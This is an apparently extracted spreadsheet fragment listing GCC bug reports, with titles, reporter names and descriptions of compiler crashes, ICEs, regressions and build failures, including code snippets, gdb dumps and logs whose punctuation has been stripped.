    <t>[non-unit-at-a-time] Trivial failure with IMA at -O0</t>
  </si>
  <si>
    <t>The following is a failure with IMA on fairly basic stuff.  Compile the files together as
cc -O0 -c -o foo.o file1.c file2.c
You get a multiply defined symbol in the .s file.  This goes away with -O2 or higher.
There should probably be an IMA component I don't think this is the last problem
we'll have with it (and Geoff insists it's not an optimization so that's inappropriate).
/* file 1 */
char *globals[] = {a b}
foo() {
  printf(%s\n globals[0])
}
/* file 2 */
extern char *globals[]
main() {
  printf(%s\n globals[1])
}</t>
  </si>
  <si>
    <t>GCC-30710</t>
  </si>
  <si>
    <t>Segfault</t>
  </si>
  <si>
    <t>This bug may be fixed or not.  It may be known or not.  
It would be too much work for me to find out.
gfortran segfaults at:
subroutine bar(a n)
  implicit none
  integer intent(IN) :: n
  character(n) pointer :: a(:)
  allocate(a(1))
end subroutine bar
$ gfortran -v
Using built-in specs.
Target: i586-suse-linux
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --libexecdir=/usr/lib --enable-languages=cc++objcf95javaada --disable-checking --with-gxx-include-dir=/usr/include/c++/4.0.2 --enable-java-awt=gtk --disable-libjava-multilib --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit --without-system-libunwind --host=i586-suse-linux
Thread model: posix
gcc version 4.0.2 20050901 (prerelease) (SUSE Linux)
Thanks
Juergen</t>
  </si>
  <si>
    <t>wieferink</t>
  </si>
  <si>
    <t>GCC-37986</t>
  </si>
  <si>
    <t>std::tr1::variate_generator does not conform to TR1.</t>
  </si>
  <si>
    <t>I am assuming that section 5.1.3 of [1] is sufficiently close to the final TR1. In paragraph 2 the draft allows U U&amp; U* as the first template parameter of variate_generator. However the following minimal program:
-- 
#include 
int main(int argc char **argv) {
  std::tr1::mt19937 mt
  std::tr1::uniform_real dist
  std::tr1::variate_generator&lt;
    std::tr1::mt19937
    std::tr1::uniform_real
    &gt; g(mt dist)
  std::tr1::variate_generator&lt;
    std::tr1::mt19937&amp;
    std::tr1::uniform_real
    &gt; g(mt dist)
  std::tr1::variate_generator&lt;
    std::tr1::mt19937*
    std::tr1::uniform_real
    &gt; g(
  return 0
}
-- 
Yields these error message:
-- 
/opt/local/include/gcc43/c++/tr1_impl/random: In instantiation of 'std::tr1::__detail::_Adaptor &gt;':
/opt/local/include/gcc43/c++/tr1_impl/random:245:   instantiated from 'std::tr1::variate_generator &gt;'
tr1_43.cpp:14:   instantiated from here
/opt/local/include/gcc43/c++/tr1_impl/random:82: error: 'std::tr1::mt19937&amp;' is not a class struct or union type
/opt/local/include/gcc43/c++/tr1_impl/random: In instantiation of 'std::tr1::__detail::_Adaptor &gt;':
/opt/local/include/gcc43/c++/tr1_impl/random:245:   instantiated from 'std::tr1::variate_generator &gt;'
tr1_43.cpp:18:   instantiated from here
/opt/local/include/gcc43/c++/tr1_impl/random:82: error: 'std::tr1::mt19937*' is not a class struct or union type
-- 
I do not know if this is still the case with gcc 4.4.
[1] www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1836.pdf</t>
  </si>
  <si>
    <t>holtgrewe</t>
  </si>
  <si>
    <t>GCC-8004</t>
  </si>
  <si>
    <t>All C++ binaries crash in __register_frame_info_bases on Sparc Solaris 2.7</t>
  </si>
  <si>
    <t>All binaries appear to crash in __register_frame_info_bases.
Here is the gdb info:
0xff2b5ffc :       save  %sp -112 %sp
0xff2b6000 :     sethi  %hi(0) %o0
0xff2b6004 :     sethi  %hi(0x11400) %l7
0xff2b6008 :
    call  0xff2b5e38 
0xff2b600c :
    add  %l7 0x1ac %l7        ! 0x115ac 
0xff2b6010 :    or  %o0 0x84 %o0
0xff2b6014 :    sethi  %hi(0) %o1
0xff2b6018 :    ld  [ %l7 + %o0 ] %l1
0xff2b601c :    or  %o1 0x88 %o1
0xff2b6020 :    ld  [ %l7 + %o1 ] %l0
0xff2b6024 :    ld  [ %l1 ] %o2
0xff2b6028 :    mov  -1 %o1
0xff2b602c :    st  %o1 [ %i1 ]
0xff2b6030 :    sethi  %hi(0x1fe00000) %o1
0xff2b6034 :    mov  %l0 %o0
0xff2b6038 :    st  %i2 [ %i1 + 4 ]
0xff2b603c :    st  %i3 [ %i1 + 8 ]
0xff2b6040 :    st  %i0 [ %i1 + 0xc ]
0xff2b6044 :    cmp  %o2 0
0xff2b6048 :
    be  0xff2b6058 
0xff2b604c :    st  %o1 [ %i1 + 0x10 ]
0xff2b6050 :
    call  0xff2c7818 
0xff2b6054 :    nop
0xff2b6058 :    sethi  %hi(0) %o1
0xff2b605c :    or  %o1 0x8c %o1      ! 0x8c
0xff2b6060 :   ld  [ %l7 + %o1 ] %o2
0xff2b6064 :   mov  %l0 %o0
0xff2b6068 :   ld  [ %l1 ] %o3
0xff2b606c :   ld  [ %o2 ] %o1
0xff2b6070 :   cmp  %o3 0
0xff2b6074 :   st  %o1 [ %i1 + 0x14 ]
0xff2b6078 :
    be  0xff2b6088 
0xff2b607c :   st  %i1 [ %o2 ]
0xff2b6080 :
    call  0xff2c7824 
0xff2b6084 :   nop
0xff2b6088 :   ret
0xff2b608c :   restore
End of assembler dump.
(gdb) info registers
g0             0x0      0
g1             0xff2b6090       -13934448
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x84     132
o1             0xffffffff       -1
o2             0xff215950       -14591664
o3             0x185    389
o4             0xff30b756       -13584554
o5             0xff376eb4       -13144396
sp             0xffbee8a0       4290701472
o7             0xff2b6008       -13934584
l0             0xff2c7980       -13862528
l1             0xff2c7978       -13862536
l2             0x0      0
l3             0x0      0
l4             0x0      0
l5             0x0      0
l6             0x0      0
l7             0xff2c75b4       -13863500
i0             0xff300000       -13631488
i1             0xff300000       -13631488
i2             0x0      0
i3             0x0      0
i4             0x0      0
i5             0x0      0
fp             0xffbee910       4290701584
i7             0xff2b60a0       -13934432
y              0x0      0
psr            0xfe400000       -29360128       icc:-Z-- pil:0 s:0 ps:0 et:0 cwp:0
wim            0x0      0
tbr            0x0      0
pc             0xff2b602c       4281032748
npc            0xff2b6030       -13934544
fpsr           0x0      0       rd:N tem:0 ns:0 ver:0 ftt:0 qne:0 fcc:= aexc:0 cexc:0
cpsr           0x0      0
#0  0xff2b602c in __register_frame_info_bases (begin=0xff300000
    ob=0xff300000 tbase=0x0 dbase=0x0) from /tools/kde/gnu/lib/libgcc_s.so.1
#1  0xff2b60a8 in __register_frame_info (begin=0xff300000 ob=0xff300000)
   from /tools/kde/gnu/lib/libgcc_s.so.1
#2  0xff325b20 in frame_dummy () from /tools/gcc-3.2/lib/libstdc++.so.5
#3  0xff325a08 in _init () from /tools/gcc-3.2/lib/libstdc++.so.5
#4  0xff3bad04 in ?? ()
#5  0xff3ba990 in ?? ()
#6  0xff3c4900 in ?? ()
#7  0xff3b2940 in ?? ()
The line of code crashing appears to be
  ob-&gt;pc_begin = (void *)-1
in unwind-dw2-fde.c
Disassembly of the caller:
Dump of assembler code for function __register_frame_info:
0xff2b6090 :     save  %sp -112 %sp
0xff2b6094 :   mov  %i0 %o0
0xff2b6098 :   mov  %i1 %o1
0xff2b609c :  clr  %o2
0xff2b60a0 :
    call  0xff2c7830 
0xff2b60a4 :  clr  %o3
0xff2b60a8 :  ret
0xff2b60ac :  restore
End of assembler dump.
As far as I can tell the problem is caused by the following call:
0xff2b6008 :
    call  0xff2b5e38 
This seems to overwrite %o1 with 0 since %i1 where it was saved in the caller looks valid to me.
Any help would be greatly appreciated as I would like to move from gcc 2.95.3 to 3.2 on Solaris.  So far upgrading beyond 2.95.3 has been a nightmare.
Release:
3.2
Environment:
Sparc Sun Solaris 2.7 --disable-multilib (32-bit only)
How-To-Repeat:
Compile C++ program execute binary</t>
  </si>
  <si>
    <t>GCC-6400</t>
  </si>
  <si>
    <t>[freebsd] problem compiling gcc/crtstuff.c during bootstrap</t>
  </si>
  <si>
    <t>I have problem compiling GCC 3.1 from CVS. It is unable to compile gcc/crtstuff.c. I get loads of errors about non-ascii chars and some other errors. Error log file has about 1.4MB. These are first few lines:
make[1]: Entering directory `/home/4/wilx/tmp/gcc31/objdir/libiberty'
make[2]: Entering directory `/home/4/wilx/tmp/gcc31/objdir/libiberty/testsuite'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/home/4/wilx/tmp/gcc31/objdir/libiberty/testsuite'
make[1]: Leaving directory `/home/4/wilx/tmp/gcc31/objdir/libiberty'
Bootstrapping the compiler
make[1]: Entering directory `/home/4/wilx/tmp/gcc31/objdir/gcc'
make CC=gcc libdir=/home/4/wilx/lib LANGUAGES=c  \
        CFLAGS=-g  MAKEINFO=makeinfo  \
        MAKEINFOFLAGS=
make[2]: Entering directory `/home/4/wilx/tmp/gcc31/objdir/gcc'
(cd intl &amp;&amp; make all)
make[3]: Entering directory `/home/4/wilx/tmp/gcc31/objdir/gcc/intl'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/4/wilx/tmp/gcc31/objdir/gcc/intl'
./xgcc -B./ -B/home/4/wilx/i386-unknown-freebsd3.5/bin/ -isystem /home/4/wilx/i386-unknown-freebsd3.5/include -isystem /home/4/wilx/i386-unknown-freebsd3.5/s
ys-include -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I. -I../../srcdir/gcc -I../../srcdir/gc
c/. -I../../srcdir/gcc/config -I../../srcdir/gcc/../include  -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions  \
   -c ../../srcdir/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
../../srcdir/gcc/crtstuff.c:613: parse error before numeric constant
../../srcdir/gcc/crtstuff.c:615: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:617: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:619: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:621: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:622: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:624: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:626: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:628: invalid suffix on integer constant
../../srcdir/gcc/crtstuff.c:628: warning: type defaults to `int' in declaration of `Wed'
../../srcdir/gcc/crtstuff.c:628: parse error before numeric constant
../../srcdir/gcc/crtstuff.c:629: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:630: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:630: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:631: warning: type defaults to `int' in declaration of `Wed'
../../srcdir/gcc/crtstuff.c:631: parse error before numeric constant
../../srcdir/gcc/crtstuff.c:632: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:633: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:634: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:634: too many decimal points in floating constant
../../srcdir/gcc/crtstuff.c:635: warning: type defaults to `int' in declaration of `Wed'
../../srcdir/gcc/crtstuff.c:635: parse error before numeric constant
../../srcdir/gcc/crtstuff.c:636: invalid suffix on floating constant
../../srcdir/gcc/crtstuff.c:636: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:638: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:640: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:640: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:641: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:641: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:641: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:641: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:642: syntax error at '@' token
../../srcdir/gcc/crtstuff.c:644: warning: type defaults to `int' in declaration of `charset'
../../srcdir/gcc/crtstuff.c:644: `us' undeclared here (not in a function)
../../srcdir/gcc/crtstuff.c:645: `ascii' undeclared here (not in a function)
../../srcdir/gcc/crtstuff.c:645: parse error before Content
../../srcdir/gcc/crtstuff.c:645: invalid suffix on integer constant
../../srcdir/gcc/crtstuff.c:652:7: missing terminating ' character
../../srcdir/gcc/crtstuff.c:652:7: warning: character constant too long
../../srcdir/gcc/crtstuff.c:658:8: missing terminating ' character
../../srcdir/gcc/crtstuff.c:658:8: warning: character constant too long
When I try to run the command with addition of -save-temps parameter I get this:
./xgcc -B./ -B/home/4/wilx/i386-unknown-freebsd3.5/bin/ -isystem /home/4/wilx/i386-unknown-freebsd3.5/include -isystem /home/4/wilx/i386-unknown-freebsd3.5/sys-include -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I. -I../../srcdir/gcc -I../../srcdir/gcc/. -I../../srcdir/gcc/config -I../../srcdir/gcc/../include  -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions -save-temps -c ../../srcdir/gcc/crtstuff.c -DCRT_BEGIN -o crtbegin.o
../../srcdir/gcc/crtstuff.c:652:7: missing terminating ' character
../../srcdir/gcc/crtstuff.c:658:8: missing terminating ' character
../../srcdir/gcc/crtstuff.c:659:11: missing terminating ' character
../../srcdir/gcc/crtstuff.c:661:2: missing terminating ' character
../../srcdir/gcc/crtstuff.c:662:69: missing terminating ' character
../../srcdir/gcc/crtstuff.c:663:58: missing terminating ' character
../../srcdir/gcc/crtstuff.c:1253:1: warning: null character(s) ignored
../../srcdir/gcc/crtstuff.c:3106:1: warning: FUNCTION_PROFILER redefined
In file included from tconfig.h:23
                 from ../../srcdir/gcc/crtstuff.c:61:
../../srcdir/gcc/config/i386/freebsd.h:52:1: warning: this is the location of the previous definition
../../srcdir/gcc/crtstuff.c:4157:1: warning: DBX_REGISTER_NUMBER redefined
../../srcdir/gcc/config/i386/freebsd.h:43:1: warning: this is the location of the previous definition
../../srcdir/gcc/crtstuff.c:4552:1: warning: null character(s) ignored
../../srcdir/gcc/crtstuff.c:5322:1: warning: null character(s) ignored
xgcc: Internal error: Segmentation fault (program cpp0)
Please submit a full bug report.
See  for instructions.
These are configuration flags I have used. The machine is FreeBSD 3.5 bootstraping compiler used is gcc-2.95.2.
logout ~/tmp/gcc31/objdir/gcc&gt;./xgcc -v
Using built-in specs.
Configured with: ../srcdir/configure --prefix=/home/4/wilx --enable-threads=posix --enable-version-specific-runtime-libs --enable-languages=cc++gcov --enable-nls : (reconfigured) ../srcdir/configure --prefix=/home/4/wilx --enable-threads=posix --enable-version-specific-runtime-libs --enable-languages=cc++gcov --disable-nls
Thread model: posix
gcc version 3.1 20020420 (prerelease)
Release:
3.1</t>
  </si>
  <si>
    <t>GCC-25961</t>
  </si>
  <si>
    <t>[4.2 Regression] Mainline failed to bootstrap on ia64</t>
  </si>
  <si>
    <t>I got
/export/build/gnu/gcc/build-ia64-linux/./prev-gcc/xgcc -B/export/build/gnu/gcc/build-ia64-linux/./prev-gcc/ -B/usr/gcc-4.2/ia64-unknown-linux-gnu/bin/ -c   -DUSE_LIBUNWIND_EXCEPTIONS -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Wmissing-format-attribute -Werror    -DHAVE_CONFIG_H -I. -I. -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc/. -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc/../include -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc/../libcpp/include  -I/net/gnu-13/export/gnu/src/gcc/gcc/gcc/../libdecnumber -I../libdecnumber    insn-automata.c -o insn-automata.o
cc1: warnings being treated as errors
insn-automata.c: In function â€˜internal_insn_latencyâ€™:
insn-automata.c:21461: warning: implicit declaration of function â€˜ia64_st_address_bypass_pâ€™ insn-automata.c:21465: warning: implicit declaration of function â€˜ia64_ld_address_bypass_pâ€™ insn-automata.c: In function â€˜print_reservationâ€™:
insn-automata.c:22483: warning: string length â€˜669â€™ is greater than the length â€˜509â€™ ISO C89 compilers are required to support make[5]: *** [insn-automata.o] Error 1</t>
  </si>
  <si>
    <t>GCC-2647</t>
  </si>
  <si>
    <t>ostringstream with ios::rightios::adjustfieldsetw</t>
  </si>
  <si>
    <t>ostringstream ignores a
setf(ios::rightios::adjustfield) statement followed by
a setw(20).
Resulting string obtained from str() is incorrectly
aligned.
Note: the correct result is obtained with Compaq C++V6.3-008
IBM VisualAge C++ 5 and KAI's KCC 3.4d compilers.
Release:
gcc version 2.96 20000731
Environment:
Linux 2.2.16-23 i686 (Red Hat Linux 7.0)
How-To-Repeat:
compile with
g++ t.C
execute with 
a.out</t>
  </si>
  <si>
    <t>fgygi</t>
  </si>
  <si>
    <t>GCC-17818</t>
  </si>
  <si>
    <t>[3.3 Regression] Segfault in can_throw_internal</t>
  </si>
  <si>
    <t>// { dg-do compile }
// { dg-options -O2 }
#include 
using namespace std
class X
{
  map  x3
public:
  X (int x) { }
  virtual ~X () { return }
  int bar ()
}
struct Y : public X
{
  Y (int t) : X (t) { }
  virtual ~Y () { return }
  virtual int foo () = 0
}
struct Z : public Y
{
  Z () : Y (2) { }
  ~Z () { return }
  int foo ()
}
int
Z::foo ()
{
  return bar ()
}
segfaults at least on i386-redhat-linux and x86_64-redhat-linux in 3.3.x
works in 3.2.x and 3.4.x.</t>
  </si>
  <si>
    <t>GCC-40416</t>
  </si>
  <si>
    <t>unnecessary register spill</t>
  </si>
  <si>
    <t>Compile the attached source code with options -O2 -Os -mthumb -fpic we can get a unnecessary register spill.</t>
  </si>
  <si>
    <t>carrot</t>
  </si>
  <si>
    <t>GCC-51633</t>
  </si>
  <si>
    <t>[c++0x] [4.6/4.7 Regression] ICE with invalid constexpr constructor</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.6.0:
==========================
struct A
{
  ~A()
}
struct B
{
  A a
  constexpr B() {}
}
==========================
bug.cc: In constructor 'constexpr B::B()':
bug.cc:9:18: internal compiler error: in build_constexpr_constructor_member_initializers at cp/semantics.c:5908
Please submit a full bug report [etc.]
A slightly different code snippet triggers an ICE in a different place:
==========================
struct A
{
  constexpr A() {}
  ~A()
}
struct B
{
  A a
  constexpr B() { return }
}
==========================
bug.cc: In constructor 'constexpr B::B()':
bug.cc:10:27: internal compiler error: in build_data_member_initialization at cp/semantics.c:5782
Please submit a full bug report [etc.]
This looks related to PR51612 where the ICE happens in the same place.</t>
  </si>
  <si>
    <t>GCC-35905</t>
  </si>
  <si>
    <t>gcc 4.2.3 still contains many GPL v2 references</t>
  </si>
  <si>
    <t>I just downloaded GCC 4.2.3 and discovered that it states in several places that it's using GPL v2 instead of v3 my impression from following the mailing lists is that it (and even 4.2.2) should be GPL v3.
One example (a particularly important one since it's most exposed to the user) is the manual: .  Also the top-level directory of the source contains v2 versions of COPYING and COPYING.LIB.  (I don't know what if any files within the tree refer to the top-level versions of those files instead of the versions within subdirectories but it is at the very least confusing to only have v2 versions at the top level.)  Another example I ran across is that files in libstdc++/src refer to GPL v2.  (Though given the presence of the exception there there's probably little difference between v2 and v3...)</t>
  </si>
  <si>
    <t>carlton</t>
  </si>
  <si>
    <t>GCC-83279</t>
  </si>
  <si>
    <t>std::experimental::filesystem::copy_file can't copy larger files than 2.0GiB</t>
  </si>
  <si>
    <t>GCC-version: 7.2.0
System: KDE neon (based on Ubuntu 16.04 LTS) x64 x86_64-linux-gnu
GCC-configuration-options: --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu --enable-checking=release --enable-languages=cc++ --program-suffix=-7.2 --disable-multilib --prefix=/opt/gcc-7.2.0
compile line: g++ -std=c++17 *.cpp *.h -lstdc++fs
thrown exception: filesystem error: cannot copy file: No such file or directory [/path/to/sourcefile] [/path/to/destinationfile]
preprocessed file: see attachment
detailed description:
The function std::experimental::filesystem::copy_file is not able to copy any file larger than 2.0GiB (2147483647 Bytes). If you try this the mentioned exception will be thrown after 2.0GiB of an &gt;2.0GiB-file were copied - so that the copy process is canceled and the copied file is incomplete.
I could reproduce this behavior in more than one program by simply using std::experimental::filesystem::copy.
However when I compiled it with GCC 5.4.0 (g++ -std=c++14 *.cpp *.h -lstdc++fs) everything works fine and I can copy files with a size of over 2.0GiB.
I am sorry for any English mistakes.
Please contact me if there are any open questions.</t>
  </si>
  <si>
    <t>ta12ba34</t>
  </si>
  <si>
    <t>GCC-50982</t>
  </si>
  <si>
    <t>AIX libstdc++ GTHREADS incompatibility</t>
  </si>
  <si>
    <t>The reorganization of gthr files into libgcc breaks bootstrap because some header files include other files but look in the wrong directory.
libgcc/config/rs6000/gthr-aix.h
#include config/gthr-posix.h
libgcc/config/gthr-vxworks.h
#include config/gthr-posix.h
libgcc/config/gthr-lynx.h
#include config/gthr-posix.h
However gthr-posix.h is installed in the same directory as gthr-default.h.  The header files were edited to include other headers based on the new source tree hierarchy but that is not where the files are installed.</t>
  </si>
  <si>
    <t>GCC-79955</t>
  </si>
  <si>
    <t>GLIBC build fails after r245840</t>
  </si>
  <si>
    <t>Created attachment 40920
CPP output file for mips-mti-linux-gnu target
See:
https://sourceware.org/ml/libc-alpha/2017-03/msg00052.html
We are working around the issue by disabling -Werror in the build.
I'll upload an X86_64 .i file tomorrow.
$ mips-mti-linux-gnu-gcc -mabi=32 fnmatch.i -c -std=gnu11 -fgnu89-inline  -O2 -Wall -Wundef -Wwrite-strings -fmerge-all-constants -fno-stack-protector -frounding-math \
-g -Wstrict-prototypes -Wold-style-definition     -ftls-model=initial-exec
In file included from fnmatch.c:250:0:
fnmatch_loop.c: In function 'internal_fnwmatch':
../locale/weightwc.h:103:28: warning: '*((void *)&amp;str+4)' may be used uninitialized in this function [-Wmaybe-uninitialized]</t>
  </si>
  <si>
    <t>doug.gilmore</t>
  </si>
  <si>
    <t>GCC-71600</t>
  </si>
  <si>
    <t>[7 regression] test case gcc.dg/gnu89-const-expr-1.c fails starting with r237581</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/gnu89-const-expr-1.c  (test for errors line 26)
line 26:
    E7 = __alignof__ (a) /* { dg-error __alignof__ \\(expression\\) } */
This revision changed things so the __alignof__ expression is now valid.  If that is correct then this test case needs to be updated.</t>
  </si>
  <si>
    <t>GCC-50090</t>
  </si>
  <si>
    <t>ARM EABI symbols in libgcc.a have default visibility</t>
  </si>
  <si>
    <t>EABI functions like __aeabi_f2ulz are defined as aliases
of standard libgcc functions like __fixunssfdi.  In libgcc.a
the standard function gets the correct hidden visibility
but the alias retains default visibility.  This means that
DSOs linked against libgcc.a may end up exporting the
libgcc.a definition of __aeabi_f2ulz.
The bug is that bpabi-lib.h uses an asm statement to define
an alias so the standard ways of forcing hidden visibility
at the C level have no effect.</t>
  </si>
  <si>
    <t>GCC-141</t>
  </si>
  <si>
    <t>C++: Is this a bug with throw and -fomit-frame-pointer?</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Tue 19 Oct 1999 20:54:22 +0000
 I've got a short C++ test program which enters a try { } block then
 calls some C code.  The C code calls some C++ code (via a function
 pointer) in the test program which throws an exception.  If the code in
 the try {} block calls the C code directly then the catch () { }
 handler is invoked.  However when I compile the files a certain way and
 the try{} block calls a C++ function then calls the C function to cause
 the exception the program calls abort() because it can't find the catch
 handler.
 If I compile the files like this:
	 gcc -fexceptions -fomit-frame-pointer callit.c -c -o callit.o
	 g++ throwa.c callit.o -o die
 The program will exit by calling abort().
 If I compile the files like this:
	 gcc -fexceptions -fomit-frame-pointer callit.c -c -o callit.o
	 gcc -fomit-frame-pointer throwa.c callit.o -o live
 The program executes to completion.
 What's going on here?  I believe this to be a bug--I believe that throw
 should be able to follow the stack even when compiled as above.  Is
 this the case?
 I'm using Linux Mandrake 6.1 on x86.  I've installed GCC 2.95.1 and am
 using that for this test rather than egcs 1.1.2.
 Thanks for your time.
 --
 George T. Talbot
 --------------------- cut here:  callit.c
 --------------------------------
 static  void    (*function) (void)
 void callthis(void (*f) (void))
 {
	 function        = f
 }
 void    dome(void)
 {
	 function()
 }
 --------------------- cut here:  throwa.c
 --------------------------------
 #include 
 class throwa
 {
 public:
	 throwa(void) { }
	 ~throwa() { }
 }
 extern C void callthis(void (*f) (void))
 extern C void dome(void)
 void    throwthething(void)
 {
	 cout &lt;&lt; Gonna throw one. &lt;&lt; endl &lt;&lt; flush
	 throw throwa()
 }
 void    again(void)
 {
	 dome()
 }
 int main(int argc char *argv[])
 {
	 callthis(throwthething)
	 try
	 {
		 cout &lt;&lt; Before try one. &lt;&lt; endl &lt;&lt; flush
		 dome()
	 }
	 catch (throwa)
	 {
		 cout &lt;&lt; First try works. &lt;&lt; endl &lt;&lt; flush
	 }
	 try
	 {
		 again()
	 }
		 // Will not be caught with first compilation case.
	 catch (throwa)
	 {
		 cout &lt;&lt; Second try works. &lt;&lt; endl &lt;&lt; flush
	 }
	 return 0
 }
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-11531</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE on invalid code (returning to void)</t>
  </si>
  <si>
    <t xml:space="preserve">
g++ 3.4 crashes on the (invalid) code below:
$ g++ -c y.cc
y.cc: In function `void runcallback()':
y.cc:1: error: return-statement with a value in function returning `
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
Environment:
System: Linux karma 2.4.19-emp_2419p5a829i #1 Tue Sep 3 17:42:17 EST 2002 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f77 : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)
How-To-Repeat:
Compile this:
-------------------------------------
void runcallback() { return 0 }
-------------------------------------</t>
  </si>
  <si>
    <t>GCC-8895</t>
  </si>
  <si>
    <t>ICE on invalid template default value specification</t>
  </si>
  <si>
    <t>This (illegal) code
-------------------
template  &gt;
struct B {
  B(int)
  B(const B
}
-------------------
makes present 3.3 crash:
tmp/g&gt; /home/bangerth/bin/gcc-3.3-pre/bin/c++ -c y.cc
y.cc:1: error: parse error before `&lt;' token
y.cc:4: error: `Y' was not declared in this scope
y.cc:4: error: parse error before `&amp;' token
y.cc:4: error: ISO C++ forbids declaration of `B' with no type
y.cc:4: internal compiler error: Speicherzugriffsfehler
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc2.95 fares a little better:
tmp/g&gt; c++ -c y.cc
y.cc:1: parse error before `&lt;'
y.cc:4: `Y' was not declared in this scope
y.cc:4: parse error before `&amp;'
y.cc:4: ANSI C++ forbids declaration `B' with no type
y.cc:4: confused by earlier errors bailing out
I don't know whether this is significant enough to
warrant it marking as a regression. Others might 
decide this.
Regards
  Wolfgang
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-43631</t>
  </si>
  <si>
    <t>var-tracking inserts notes with non-NULL BLOCK_FOR_INSN in between basic blocks</t>
  </si>
  <si>
    <t>Seen on ia64-unknown-linux but probably reproducible elsewhere also:
$ cat t.c
typedef unsigned int UDItype __attribute__ ((mode (DI)))
typedef int TItype __attribute__ ((mode (TI)))
struct DWstruct {UDItype low high}
typedef union
{
  struct DWstruct s
  TItype ll
} DWunion
TItype
__multi3 (TItype u TItype v)
{
  const DWunion uu = {.ll = u}
  const DWunion vv = {.ll = v}
  DWunion w = {.ll = ({DWunion __w __asm__ (xma.hu %0 = %2 %3 f0\n\txma.l %1 = %2 %3 f0 : = __w.ll })}
  w.s.high += (uu.s.low * vv.s.high + uu.s.high * vv.s.low)
  return w.ll
}
$ ./cc1 -quiet -g -O2 t.c
t.c: In function '__multi3':
t.c:19:1: error: insn 111 outside of basic blocks has non-NULL bb field
t.c:19:1: error: insn 110 outside of basic blocks has non-NULL bb field
t.c:19: confused by earlier errors bailing out
Needs a patch to var-tracking.c to expose the problem:
Index: var-tracking.c
===================================================================
--- var-tracking.c      (revision 157942)
+++ var-tracking.c      (working copy)
@@ -1156 +1158 @@
 #include pointer-set.h
 #include recog.h
+#undef ENABLE_CHECKING
+#define ENABLE_CHECKING 1
 /* var-tracking.c assumes that tree code with the same value as VALUE rtx code
    has no chance to appear in REG_EXPR/MEM_EXPRs and isn't a decl.
    Currently the value is the same as IDENTIFIER_NODE which has such
@@ -84896 +84917 @@ variable_tracking_main (void)
   flag_var_tracking_assignments = save
+  verify_flow_info ()
   return ret
 }
This comes from emit_notes_for_differences. I have no idea what the purpose is of the notes between basic blocks. Apparently the CFG has to be frozen at this point or the notes make no sense to begin with. But it's also not clear to me where the notes should be emitted.
Help sought from a VTA guy i.e. Jakub or Alexandre :-)</t>
  </si>
  <si>
    <t>GCC-1997</t>
  </si>
  <si>
    <t>gcc-20010122 ice on Blitz++ testuite compiles .ii files!</t>
  </si>
  <si>
    <t>gcc crashes with an ICE on the following testuite files in Blitz++:
extract.cpp
chris-jeffery-1.cpp
However gcc compiles the .ii files just fine!  If you need to
reproduce the problem you have to get the Blitz++ CVS sources.
However they do not quite compile with gcc.  I had to make a slight
change.  I can provide the change (or perhaps by the time you read
this the CVS sources will be fixed--I submitted a bug report). Or I
can send the whole corrected Blitz++ distribution to you.  I am
including extract.ii just it case it helps.
Here is the output from gcc -v for extract.cpp
